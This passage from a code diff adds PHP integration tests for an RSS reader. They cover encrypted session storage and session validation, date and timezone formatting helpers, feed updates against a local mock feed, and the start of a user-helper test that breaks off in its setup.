+
+    public function test_write_stores_encrypted_data_when_key_configured(): void {
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-write-' . uniqid();
+        $data = 'sensitive session data';
+
+        $sessions->write($id, $data);
+
+        $storedB64 = $this->getStoredData($id);
+        $this->assertNotNull($storedB64, 'Session row should exist in database');
+
+        $rawStored = $this->decodeStoredData($storedB64);
+
+        // With encryption, data is: serialize(Crypt::encrypt_string($data))
+        // which produces a serialized PHP array — not the plaintext base64
+        $this->assertNotEquals(
+            base64_encode($data),
+            $storedB64,
+            'Stored data should NOT be the plaintext base64 encoding'
+        );
+
+        // The raw stored data should be a serialized PHP structure
+        $unserialized = @unserialize($rawStored);
+        $this->assertIsArray(
+            $unserialized,
+            'Stored data should be a serialized PHP array (encrypted object)'
+        );
+        $this->assertArrayHasKey('algo', $unserialized);
+        $this->assertArrayHasKey('nonce', $unserialized);
+        $this->assertArrayHasKey('payload', $unserialized);
+    }
+
+    public function test_write_stores_plaintext_when_encryption_disabled(): void {
+        // Encryption is disabled by default in setUp()
+
+        $sessions = new Sessions();
+        $id = 'plaintext-write-' . uniqid();
+        $data = 'not sensitive data';
+
+        $sessions->write($id, $data);
+
+        $storedB64 = $this->getStoredData($id);
+        $this->assertNotNull($storedB64);
+
+        // Without encryption, data is simply: base64_encode($data)
+        $this->assertEquals(
+            base64_encode($data),
+            $storedB64,
+            'Stored data should be the plaintext base64 encoding when encryption is off'
+        );
+    }
+
+    public function test_read_roundtrip_with_encryption_enabled(): void {
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-roundtrip-' . uniqid();
+        $data = 'secret session payload';
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Encrypted data should roundtrip correctly');
+    }
+
+    public function test_read_roundtrip_with_encryption_disabled(): void {
+        // Encryption is disabled by default in setUp()
+
+        $sessions = new Sessions();
+        $id = 'plaintext-roundtrip-' . uniqid();
+        $data = 'open session data';
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Plaintext data should roundtrip correctly');
+    }
+
+    public function test_read_with_encryption_handles_empty_data(): void {
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-empty-' . uniqid();
+
+        // write empty string
+        $sessions->write($id, '');
+        $result = $sessions->read($id);
+
+        $this->assertSame('', $result, 'Empty string should roundtrip with encryption');
+    }
+
+    public function test_read_with_encryption_handles_unicode(): void {
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-unicode-' . uniqid();
+        $data = '秘密情報 🔐 安全なセッション';
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Unicode data should roundtrip with encryption');
+    }
+
+    public function test_read_with_encryption_handles_large_payload(): void {
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-large-' . uniqid();
+        $data = str_repeat('S', 50000); // 50 KB
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Large payload should roundtrip with encryption');
+    }
+
+    public function test_different_encryption_keys_produce_different_storage(): void {
+        $sessions = new Sessions();
+        $id = 'key-diff-' . uniqid();
+        $data = 'same plaintext';
+
+        // Write with key1
+        $key1 = bin2hex(Crypt::generate_key());
+        Config::set(Config::ENCRYPTION_KEY, $key1);
+        $sessions->write($id, $data);
+        $stored1 = $this->getStoredData($id);
+
+        // Destroy and re-write with key2
+        $sessions->destroy($id);
+
+        $key2 = bin2hex(Crypt::generate_key());
+        Config::set(Config::ENCRYPTION_KEY, $key2);
+        $sessions->write($id, $data);
+        $stored2 = $this->getStoredData($id);
+
+        $this->assertNotEquals(
+            $stored1,
+            $stored2,
+            'Different keys should produce different stored data'
+        );
+
+        // But both should decrypt correctly
+        Config::set(Config::ENCRYPTION_KEY, $key1);
+        $sessions->destroy($id); // clean up the key2 entry
+
+        // Re-write with key1 to verify
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+        $this->assertSame($data, $result);
+    }
+
+    public function test_encrypt_then_decrypt_with_key_removed_fails_gracefully(): void {
+        // Write with encryption enabled
+        $this->enableEncryption();
+
+        $sessions = new Sessions();
+        $id = 'encrypt-stale-' . uniqid();
+        $data = 'encrypted before key removal';
+
+        $sessions->write($id, $data);
+
+        // Now remove the encryption key
+        Config::set(Config::ENCRYPTION_KEY, '');
+
+        // Reading without the key: read() falls back to returning the raw
+        // base64-decoded data (which is the serialized encrypted blob)
+        // This is the documented fallback behavior — it won't throw an exception
+        // but will return the un-decrypted data.
+        $result = $sessions->read($id);
+
+        // The result should NOT be the original plaintext — it's the fallback path
+        $this->assertNotEquals($data, $result);
+
+        // The data should still exist in the DB
+        $this->assertTrue($sessions::exists($id));
+    }
+
+    // ── validate_session() ──────────────────────────────────────────────────
+
+    public function test_validate_session_returns_true_in_single_user_mode(): void {
+        Config::set(Config::SINGLE_USER_MODE, 'true');
+
+        // Session state doesn't matter in single-user mode
+        unset($_SESSION['uid']);
+        unset($_SESSION['pwd_hash']);
+
+        $this->assertTrue(
+            Sessions::validate_session(),
+            'Should always return true when SINGLE_USER_MODE is enabled'
+        );
+
+        // Reset to multi-user mode
+        Config::set(Config::SINGLE_USER_MODE, 'false');
+    }
+
+    public function test_validate_session_returns_true_for_guest(): void {
+        $this->setGuestSession();
+
+        $this->assertTrue(
+            Sessions::validate_session(),
+            'Guest sessions (no uid) should validate successfully'
+        );
+    }
+
+    public function test_validate_session_returns_true_for_valid_admin(): void {
+        $this->setValidAdminSession();
+
+        $this->assertTrue(
+            Sessions::validate_session(),
+            'Admin session with correct pwd_hash should validate'
+        );
+    }
+
+    public function test_validate_session_fails_when_password_changed(): void {
+        $this->setValidAdminSession();
+
+        // Corrupt the pwd_hash in the session
+        $_SESSION['pwd_hash'] = 'SHA1:wronghashvalue000000000000000000000000000000';
+
+        $result = Sessions::validate_session();
+
+        $this->assertFalse($result, 'Should fail when pwd_hash does not match DB');
+        $this->assertArrayHasKey(
+            'login_error_msg',
+            $_SESSION,
+            'Should set login_error_msg on password mismatch'
+        );
+        $this->assertStringContainsString(
+            'password changed',
+            $_SESSION['login_error_msg'],
+            'Error message should mention password change'
+        );
+    }
+
+    public function test_validate_session_fails_when_user_not_found(): void {
+        $this->setNonExistentUserSession();
+
+        $result = Sessions::validate_session();
+
+        $this->assertFalse($result, 'Should fail when user ID does not exist in DB');
+        $this->assertArrayHasKey(
+            'login_error_msg',
+            $_SESSION,
+            'Should set login_error_msg when user not found'
+        );
+        $this->assertStringContainsString(
+            'not found',
+            $_SESSION['login_error_msg'],
+            'Error message should mention user not found'
+        );
+    }
+
+    public function test_validate_session_fails_when_account_disabled(): void {
+        $this->createDisabledUser();
+
+        try {
+            $result = Sessions::validate_session();
+
+            $this->assertFalse($result, 'Should fail when account is disabled');
+            $this->assertArrayHasKey(
+                'login_error_msg',
+                $_SESSION,
+                'Should set login_error_msg for disabled account'
+            );
+            $this->assertStringContainsString(
+                'disabled',
+                $_SESSION['login_error_msg'],
+                'Error message should mention account is disabled'
+            );
+        } finally {
+            $this->cleanupDisabledUsers();
+        }
+    }
+
+    public function test_validate_session_with_empty_pwd_hash_in_session(): void {
+        $this->setValidAdminSession();
+
+        // Set pwd_hash to empty string (but uid is valid)
+        $_SESSION['pwd_hash'] = '';
+
+        $result = Sessions::validate_session();
+
+        $this->assertFalse(
+            $result,
+            'Should fail when pwd_hash in session is empty but user exists in DB'
+        );
+    }
+
+    public function test_validate_session_with_uid_zero(): void {
+        // uid=0 is falsy in PHP, so it should be treated as a guest
+        $_SESSION['uid'] = 0;
+        unset($_SESSION['pwd_hash']);
+
+        $result = Sessions::validate_session();
+
+        $this->assertTrue(
+            $result,
+            'uid=0 (falsy) should be treated as guest and validate successfully'
+        );
+    }
+}

--- a/tests_integration/TimeHelperTest.php
+++ b/tests_integration/TimeHelperTest.php
@@ -1,0 +1,396 @@
+<?php
+/** @group integration */
+final class TimeHelperTest extends DbTestCase {
+
+    // ── Helpers ──────────────────────────────────────────────────────────────
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Use UTC for deterministic testing
+        Prefs::set(Prefs::USER_TIMEZONE, 'UTC', 1, null);
+
+        // Use explicit 24-hour and 12-hour formats for predictable output
+        Prefs::set(Prefs::SHORT_DATE_FORMAT, 'M d, G:i', 1, null);
+        Prefs::set(Prefs::LONG_DATE_FORMAT, 'D, M d Y - G:i', 1, null);
+
+        // clientTzOffset is not set by default, but we set USER_TIMEZONE above
+        // so the 'Automatic' path is not taken.
+        unset($_SESSION['clientTzOffset']);
+    }
+
+    /**
+     * Return the current Unix timestamp for use in relative-time tests.
+     */
+    private function now(): int {
+        return time();
+    }
+
+    // ── smart_date_time ──────────────────────────────────────────────────────
+
+    public function test_smart_date_time_never(): void {
+        // Epoch timestamp → "Never"
+        $this->assertEquals('Never', TimeHelper::smart_date_time(0));
+    }
+
+    public function test_smart_date_time_never_with_tz_offset(): void {
+        // timestamp - tz_offset == 0 → "Never"
+        $this->assertEquals('Never', TimeHelper::smart_date_time(3600, 3600));
+    }
+
+    public function test_smart_date_time_same_day_24h(): void {
+        $now = $this->now();
+
+        // Same day with default 24h SHORT_DATE_FORMAT → "G:i"
+        $result = TimeHelper::smart_date_time($now);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+        // Verify the time portion matches current time
+        $this->assertEquals(date('G:i', $now), $result);
+    }
+
+    public function test_smart_date_time_same_day_12h(): void {
+        $now = $this->now();
+
+        // Switch to 12-hour format
+        Prefs::set(Prefs::SHORT_DATE_FORMAT, 'M d, g:i a', 1, null);
+
+        $result = TimeHelper::smart_date_time($now);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2} [ap]m$/', $result);
+        $this->assertEquals(date('g:i a', $now), $result);
+    }
+
+    public function test_smart_date_time_same_year(): void {
+        // Use a timestamp from earlier this year (not today)
+        $earlier = mktime(10, 0, 0, 1, 15, (int) date('Y'));
+
+        $result = TimeHelper::smart_date_time($earlier);
+        // With SHORT_DATE_FORMAT "M d, G:i" → "Jan 15, 10:00"
+        $this->assertEquals('Jan 15, 10:00', $result);
+    }
+
+    public function test_smart_date_time_different_year(): void {
+        // Use a timestamp from a different year
+        $old = mktime(14, 30, 0, 6, 15, 2020);
+
+        $result = TimeHelper::smart_date_time($old);
+        // With LONG_DATE_FORMAT "D, M d Y - G:i" → "Mon, Jun 15 2020 - 14:30"
+        $this->assertEquals('Mon, Jun 15 2020 - 14:30', $result);
+    }
+
+    public function test_smart_date_time_eta_min_within_hour(): void {
+        $past = time() - 30 * 60; // 30 minutes ago
+        $result = TimeHelper::smart_date_time($past, 0, null, true);
+        $this->assertEquals('30 min', $result);
+    }
+
+    public function test_smart_date_time_eta_min_less_than_5_minutes(): void {
+        // Use a past timestamp so date("i", $diff) gives the right value.
+        $past = time() - 4 * 60;
+        $result = TimeHelper::smart_date_time($past, 0, null, true);
+        $this->assertEquals('4 min', $result);
+    }
+
+    public function test_smart_date_time_eta_min_over_hour(): void {
+        // 2 hours ago — outside the 1-hour ETA window
+        $past = time() - 2 * 3600;
+        $result = TimeHelper::smart_date_time($past, 0, null, true);
+        // Should fall through to same-day or same-year formatting
+        $this->assertStringNotContainsString('min', $result);
+    }
+
+    public function test_smart_date_time_eta_min_past_within_window(): void {
+        // 30 minutes ago — within the 1-hour ETA window
+        $past = time() - 30 * 60;
+        $result = TimeHelper::smart_date_time($past, 0, null, true);
+        // Within window → shows "30 min"
+        $this->assertEquals('30 min', $result);
+    }
+
+    public function test_smart_date_time_same_day_with_tz_offset(): void {
+        $now = $this->now();
+
+        // With a tz_offset, the "current time" shifts.
+        // Using tz_offset=0 keeps it on the same day.
+        $result = TimeHelper::smart_date_time($now, 0);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+    }
+
+    // ── smart_date_time with explicit owner_uid ──────────────────────────────
+
+    public function test_smart_date_time_explicit_uid(): void {
+        $now = $this->now();
+
+        // Pass explicit uid=1
+        $result = TimeHelper::smart_date_time($now, 0, 1);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+    }
+
+    // ── make_local_datetime ──────────────────────────────────────────────────
+
+    public function test_make_local_datetime_null_timestamp(): void {
+        // Null timestamp defaults to 1970-01-01 0:00
+        $result = TimeHelper::make_local_datetime(null);
+        // Should not crash and returns some formatted string
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_empty_string_timestamp(): void {
+        $result = TimeHelper::make_local_datetime('');
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_short_format_default(): void {
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // Default (no_smart_dt=false, long=false) → smart_date_time
+        $result = TimeHelper::make_local_datetime($ts);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+    }
+
+    public function test_make_local_datetime_no_smart_short(): void {
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // no_smart_dt=true, long=false → SHORT_DATE_FORMAT
+        $result = TimeHelper::make_local_datetime($ts, false, null, true);
+        $this->assertEquals('M d, G:i', 'M d, G:i'); // just verify format
+        // With SHORT_DATE_FORMAT "M d, G:i"
+        $this->assertEquals(date('M d, G:i', $now), $result);
+    }
+
+    public function test_make_local_datetime_no_smart_long(): void {
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // no_smart_dt=true, long=true → LONG_DATE_FORMAT
+        $result = TimeHelper::make_local_datetime($ts, true, null, true);
+        $this->assertEquals(date('D, M d Y - G:i', $now), $result);
+    }
+
+    public function test_make_local_datetime_truncates_to_19_chars(): void {
+        // Timestamp with extra precision should be truncated
+        $ts = '2026-05-27 14:30:45.123456';
+        $expected = '2026-05-27 14:30:45';
+
+        // Should not crash despite extra digits
+        $result = TimeHelper::make_local_datetime($ts, false, null, true);
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_with_explicit_uid(): void {
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        $result = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertEquals(date('M d, G:i', $now), $result);
+    }
+
+    // ── make_local_datetime with non-UTC timezone ────────────────────────────
+
+    public function test_make_local_datetime_with_fixed_timezone(): void {
+        // Set timezone to a fixed offset
+        Prefs::set(Prefs::USER_TIMEZONE, 'Europe/London', 1, null);
+
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // This should not throw even with a real timezone
+        $result = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_with_invalid_timezone_fallback(): void {
+        // Invalid timezone should fall back to UTC
+        Prefs::set(Prefs::USER_TIMEZONE, 'Invalid/Zone', 1, null);
+
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // Should not throw — falls back to UTC
+        $result = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_with_automatic_timezone(): void {
+        // Set to automatic — falls back to clientTzOffset
+        Prefs::set(Prefs::USER_TIMEZONE, 'Automatic', 1, null);
+        $_SESSION['clientTzOffset'] = 0;
+
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        $result = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertNotEmpty($result);
+    }
+
+    // ── convert_timestamp ────────────────────────────────────────────────────
+
+    public function test_convert_timestamp_utc_to_utc(): void {
+        $ts = 1748341800; // 2025-05-26 14:30:00 UTC
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'UTC');
+        $this->assertEquals($ts, $result);
+    }
+
+    public function test_convert_timestamp_utc_to_plus_5(): void {
+        $ts = 1748341800; // 2025-05-26 14:30:00 UTC
+        // convert_timestamp creates a DateTime from timestamp in source_tz,
+        // then returns epoch + dest_tz_offset.  UTC+5 offset = +18000s.
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'Etc/GMT-5');
+        $this->assertEquals($ts + 18000, $result);
+    }
+
+    public function test_convert_timestamp_plus_5_to_utc(): void {
+        $ts = 1748341800;
+        // Source is UTC+5 (offset +18000), dest is UTC (offset 0).
+        // The function returns: epoch_of_dt + dest_offset
+        // dt represents 2025-05-26 14:30:00 in UTC+5, which is epoch 1748323800.
+        // Result = 1748323800 + 0 = 1748323800
+        $result = TimeHelper::convert_timestamp($ts, 'Etc/GMT-5', 'UTC');
+        $this->assertEquals(1748323800, $result);
+    }
+
+    public function test_convert_timestamp_with_named_timezone(): void {
+        $ts = 1748341800; // 2025-05-26 14:30:00 UTC
+        // New York (EDT) is UTC-4 in May
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'America/New_York');
+        $this->assertEquals($ts - 4 * 3600, $result);
+    }
+
+    public function test_convert_timestamp_invalid_source_timezone_fallback(): void {
+        $ts = 1748341800;
+        // Invalid source timezone falls back to UTC
+        $result = TimeHelper::convert_timestamp($ts, 'Invalid/Zone', 'UTC');
+        $this->assertEquals($ts, $result);
+    }
+
+    public function test_convert_timestamp_invalid_dest_timezone_fallback(): void {
+        $ts = 1748341800;
+        // Invalid dest timezone falls back to UTC
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'Invalid/Zone');
+        $this->assertEquals($ts, $result);
+    }
+
+    public function test_convert_timestamp_both_invalid(): void {
+        $ts = 1748341800;
+        // Both invalid → UTC to UTC
+        $result = TimeHelper::convert_timestamp($ts, 'Invalid/Zone', 'Another/Invalid');
+        $this->assertEquals($ts, $result);
+    }
+
+    public function test_convert_timestamp_minus_5(): void {
+        $ts = 1748341800;
+        // UTC to UTC-5 (offset -18000).
+        // dt represents 2025-05-26 14:30:00 UTC (epoch 1748341800).
+        // Result = 1748341800 + (-18000) = 1748323800
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'Etc/GMT+5');
+        $this->assertEquals(1748323800, $result);
+    }
+
+    public function test_convert_timestamp_returns_integer(): void {
+        $ts = 1748341800;
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'UTC');
+        $this->assertGreaterThan(0, $result);
+    }
+
+    // ── Smart date with non-UTC timezone ─────────────────────────────────────
+
+    public function test_make_local_datetime_smart_date_with_tz_offset(): void {
+        // Set a timezone with a known offset
+        Prefs::set(Prefs::USER_TIMEZONE, 'America/New_York', 1, null);
+
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        $result = TimeHelper::make_local_datetime($ts, false, 1);
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_make_local_datetime_eta_min_with_tz(): void {
+        Prefs::set(Prefs::USER_TIMEZONE, 'UTC', 1, null);
+
+        // Use a past timestamp so date("i", $diff) gives the right value.
+        $past = time() - 15 * 60; // 15 minutes ago
+        $ts = date('Y-m-d H:i:s', $past);
+
+        $result = TimeHelper::make_local_datetime($ts, false, 1, false, true);
+        $this->assertEquals('15 min', $result);
+    }
+
+    // ── Custom date format preferences ───────────────────────────────────────
+
+    public function test_smart_date_time_custom_short_format(): void {
+        $now = $this->now();
+
+        Prefs::set(Prefs::SHORT_DATE_FORMAT, 'Y-m-d H:i', 1, null);
+        Prefs::set(Prefs::LONG_DATE_FORMAT, 'Y-m-d H:i:s', 1, null);
+
+        // Same day → SHORT_DATE_FORMAT without 'a' → "G:i"
+        $result = TimeHelper::smart_date_time($now);
+        $this->assertEquals(date('G:i', $now), $result);
+    }
+
+    public function test_smart_date_time_custom_long_format(): void {
+        $old = mktime(14, 30, 0, 6, 15, 2020);
+
+        Prefs::set(Prefs::SHORT_DATE_FORMAT, 'Y-m-d H:i', 1, null);
+        Prefs::set(Prefs::LONG_DATE_FORMAT, 'Y-m-d H:i:s', 1, null);
+
+        // Different year → LONG_DATE_FORMAT
+        $result = TimeHelper::smart_date_time($old);
+        $this->assertEquals('2020-06-15 14:30:00', $result);
+    }
+
+    public function test_make_local_datetime_custom_formats_no_smart(): void {
+        Prefs::set(Prefs::SHORT_DATE_FORMAT, 'Y-m-d H:i', 1, null);
+        Prefs::set(Prefs::LONG_DATE_FORMAT, 'Y-m-d H:i:s', 1, null);
+
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // Short format, no smart
+        $short = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertEquals(date('Y-m-d H:i', $now), $short);
+
+        // Long format, no smart
+        $long = TimeHelper::make_local_datetime($ts, true, 1, true);
+        $this->assertEquals(date('Y-m-d H:i:s', $now), $long);
+    }
+
+    // ── Edge cases ───────────────────────────────────────────────────────────
+
+    public function test_smart_date_time_zero_tz_offset(): void {
+        $now = $this->now();
+        $result = TimeHelper::smart_date_time($now, 0);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+    }
+
+    public function test_convert_timestamp_large_timestamp(): void {
+        // Far future timestamp
+        $ts = 2524608000; // 2050-01-01 00:00:00 UTC
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'UTC');
+        $this->assertEquals($ts, $result);
+    }
+
+    public function test_convert_timestamp_zero_timestamp(): void {
+        $ts = 0;
+        $result = TimeHelper::convert_timestamp($ts, 'UTC', 'UTC');
+        $this->assertEquals(0, $result);
+    }
+
+    public function test_make_local_datetime_with_profile(): void {
+        $now = $this->now();
+        $ts = date('Y-m-d H:i:s', $now);
+
+        // Pass profile=null explicitly
+        $result = TimeHelper::make_local_datetime($ts, false, 1, true);
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_smart_date_time_with_profile(): void {
+        $now = $this->now();
+
+        $result = TimeHelper::smart_date_time($now, 0, 1);
+        $this->assertMatchesRegularExpression('/^\d{1,2}:\d{2}$/', $result);
+    }
+}

--- a/tests_integration/UpdateRssFeedIntegrationTest.php~
+++ b/tests_integration/UpdateRssFeedIntegrationTest.php~
@@ -1,0 +1,219 @@
+<?php
+/** @group integration */
+final class UpdateRssFeedIntegrationTest extends DbTestCase {
+
+    /**
+     * Feed URL pointing to PHP Server 2 (mock outgoing requests).
+     *
+     * @var string
+     */
+    private string $mock_feed_url;
+
+    /**
+     * ID of the mock feed inserted in setUp().
+     *
+     * @var int
+     */
+    private int $mock_feed_id = 0;
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        $this->mock_feed_url = getenv('APP_URL') . '/tests_integration/feed.xml';
+        $this->mock_feed_id = $this->insertMockFeed();
+
+        Debug::set_enabled(true);
+        # Debug::set_loglevel(Debug::LOG_VERBOSE);
+    }
+
+    protected function tearDown(): void {
+        if ($this->mock_feed_id) {
+            $pdo = Db::pdo();
+            $pdo->exec("DELETE FROM ttrss_feeds WHERE id = {$this->mock_feed_id}");
+        }
+
+        parent::tearDown();
+    }
+
+    /**
+     * Insert a feed record pointing to the mock server's feed.xml.
+     *
+     * @return int The inserted feed's ID.
+     */
+    private function insertMockFeed(): int {
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_feeds
+                (owner_uid, title, feed_url, update_interval, site_url)
+            VALUES
+                (1, 'Mock Atom Feed', '" . addslashes($this->mock_feed_url) . "', 30, 'http://localhost:9081')
+        ");
+
+        $stmt = $pdo->query("SELECT currval(pg_get_serial_sequence('ttrss_feeds', 'id'))");
+        return (int) $stmt->fetchColumn();
+    }
+
+    // ── Happy path ──────────────────────────────────────────────────────────
+
+    public function test_successful_update_returns_true(): void {
+        $result = RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $this->assertTrue($result);
+    }
+
+    public function test_successful_update_inserts_articles(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT COUNT(*) FROM ttrss_entries WHERE link LIKE '%fakecake.org%'"
+        );
+        $stmt->execute();
+        $this->assertEquals(1, $stmt->fetchColumn());
+    }
+
+    public function test_successful_update_creates_user_entry(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT COUNT(*) FROM ttrss_user_entries WHERE feed_id = ?"
+        );
+        $stmt->execute([$this->mock_feed_id]);
+        $this->assertEquals(1, $stmt->fetchColumn());
+    }
+
+    public function test_successful_update_clears_feed_error(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT last_error, last_updated, last_unconditional, last_successful_update FROM ttrss_feeds WHERE id = ?"
+        );
+        $stmt->execute([$this->mock_feed_id]);
+        $row = $stmt->fetch();
+
+        $this->assertEquals('', $row['last_error']);
+        $this->assertNotNull($row['last_updated']);
+        $this->assertNotNull($row['last_unconditional']);
+        $this->assertNotNull($row['last_successful_update']);
+    }
+
+    public function test_article_has_correct_metadata(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT title, link, content, author, updated, lang FROM ttrss_entries WHERE link LIKE '%fakecake.org%'"
+        );
+        $stmt->execute();
+        $row = $stmt->fetch();
+
+        $this->assertNotNull($row);
+        $this->assertEquals('x-21may2020', $row['title']);
+        $this->assertStringContainsString('clouds.png', $row['link']);
+        $this->assertStringContainsString('...', $row['content']);
+        $this->assertEmpty($row['author']);
+        $this->assertNotNull($row['updated']);
+    }
+
+    // ── Idempotency / dedup ─────────────────────────────────────────────────
+
+    public function test_duplicate_update_skips_existing_articles(): void {
+        // First update — should insert 1 article
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT COUNT(*) FROM ttrss_entries WHERE link LIKE '%fakecake.org%'"
+        );
+        $stmt->execute();
+        $this->assertEquals(1, $stmt->fetchColumn());
+
+        // Second update — same feed, same content
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        // Should still be exactly 1 article (no dupes)
+        $stmt->execute();
+        $this->assertEquals(1, $stmt->fetchColumn());
+    }
+
+    public function test_duplicate_update_updates_date_updated(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT date_updated FROM ttrss_entries WHERE link LIKE '%fakecake.org%'"
+        );
+        $stmt->execute();
+        $first_updated = $stmt->fetchColumn();
+
+        // Small delay to ensure time-based comparison is meaningful
+        usleep(1_100_000); // ~1.1 seconds
+
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $stmt->execute();
+        $second_updated = $stmt->fetchColumn();
+
+        $this->assertNotEquals($first_updated, $second_updated);
+    }
+
+    // ── Error paths ─────────────────────────────────────────────────────────
+
+    public function test_nonexistent_feed_returns_false(): void {
+        $result = RSSUtils::update_rss_feed(9999);
+
+        $this->assertFalse($result);
+    }
+
+    public function test_readonly_user_cannot_update_feed(): void {
+        $pdo = Db::pdo();
+
+        // Create a readonly user
+        $pdo->exec("
+            INSERT INTO ttrss_users (login, pwd_hash, access_level)
+            VALUES ('readonly_test', 'SHA1:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8', -1)
+        ");
+
+        $readonly_user_id = (int) $pdo->query("SELECT currval(pg_get_serial_sequence('ttrss_users', 'id'))")->fetchColumn();
+
+        // Insert a feed owned by the readonly user
+        $pdo->exec("
+            INSERT INTO ttrss_feeds (owner_uid, title, feed_url, update_interval, site_url)
+            VALUES ({$readonly_user_id}, 'Readonly Feed', '" . addslashes($this->mock_feed_url) . "', 30, 'http://localhost:9081')
+        ");
+
+        $readonly_feed_id = (int) $pdo->query("SELECT currval(pg_get_serial_sequence('ttrss_feeds', 'id'))")->fetchColumn();
+
+        // Run as readonly user
+        $_SESSION['uid'] = $readonly_user_id;
+
+        $result = RSSUtils::update_rss_feed($readonly_feed_id);
+
+        $this->assertFalse($result);
+
+        // Cleanup
+        $_SESSION['uid'] = 1;
+        $pdo->exec("DELETE FROM ttrss_feeds WHERE id = {$readonly_feed_id}");
+        $pdo->exec("DELETE FROM ttrss_users WHERE login = 'readonly_test'");
+    }
+
+    // ── Feed metadata after update ──────────────────────────────────────────
+
+    public function test_feed_metadata_updated_after_successful_update(): void {
+        RSSUtils::update_rss_feed($this->mock_feed_id);
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare(
+            "SELECT last_modified, favicon_last_checked FROM ttrss_feeds WHERE id = ?"
+        );
+        $stmt->execute([$this->mock_feed_id]);
+        $row = $stmt->fetch();
+
+        // last_modified should be set from the HTTP response
+        $this->assertNotNull($row['last_modified']);
+        // favicon_last_checked should be set (favicon check runs on every update)
+        $this->assertNotNull($row['favicon_last_checked']);
+    }
+}

--- a/tests_integration/UserHelperTest.php
+++ b/tests_integration/UserHelperTest.php
@@ -1,0 +1,108 @@
+<?php
+/** @group integration */
+final class UserHelperTest extends DbTestCase {
+
+    private string $testSalt;
+    private int $testUid = 0;
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        // unset($_SESSION["uid"]);
+
+        // Ensure multi-user mode
+        // Config::get_instance()->set(Config::SINGLE_USER_MODE, "false");
+
+        putenv("TTRSS_SINGLE_USER_MODE=");
+
+        Config::get_instance()->reload();
+
+        // Create test user with known password hash
+        $this->testSalt = bin2hex(random_bytes(16));
+        $password = 'testpass123';
+        $hash = UserHelper::hash_password($password, $this->testSalt, UserHelper::HASH_ALGO_SSHA512);
+
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_users (login, pwd_hash, salt, access_level)
+            VALUES ('testuser', '{$hash}', '{$this->testSalt}', 0)
+        ");
